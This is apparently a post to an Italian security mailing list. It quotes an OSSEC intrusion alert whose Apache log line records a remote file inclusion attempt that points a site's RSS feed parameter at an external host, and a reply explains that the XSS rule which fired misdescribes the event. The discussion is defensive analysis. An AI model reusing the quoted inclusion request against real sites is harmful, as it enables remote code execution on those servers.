OSSEC HIDS Notification.
2008 Feb 29 01:29:21
Received From: *********->/var/log/apache2/access.log
Rule: 31106 fired (level 12) -> "A web attack returned code 200 (success)."
Portion of the log(s):
216.114.146.27 - - [29/Feb/2008:01:29:19 +0100] "GET
/index.php?option=com_rss&feed=http%3A%2F%2Fwww.interkonet.com%2Fenxicmarxant%2Fweb%2Feditor%2Fscripts%2Ficons%2Fcatizi%2Farofo%2F&no_html=1
HTTP/1.0" 200 2160 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;
.NET CLR 1.1.4322)"
Mi limiterei ad una osservazione sull'alert di OSSEC che, IMHO,
forse era meglio fare all'inizio, anche per indirizzare in modo
corretto una parte della discussione.
E' un falso positivo. Un falso positivo nel senso che la regola
che ha rilevato questo RFI non e' pensata per un... RFI, bensi'
per un XSS. Quello che ha "tratto in inganno" il correlatore di
OSSEC e' stata la stringa "%2Fscript". La descrizione riportata
negli alert per le regole 3110[3456] e' un po' fuorviante: pure
considerando che non si tratta di regole pensate per un RFI, le
considerazioni che si possono fare sul significato di un 200 in
questi casi (tutti riguardandi la parte "query" dell'url) sono,
in sostanza, le stesse. Penso che il messaggio per questi alert
sia da scrivere in modo diverso.
Fabio
________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List
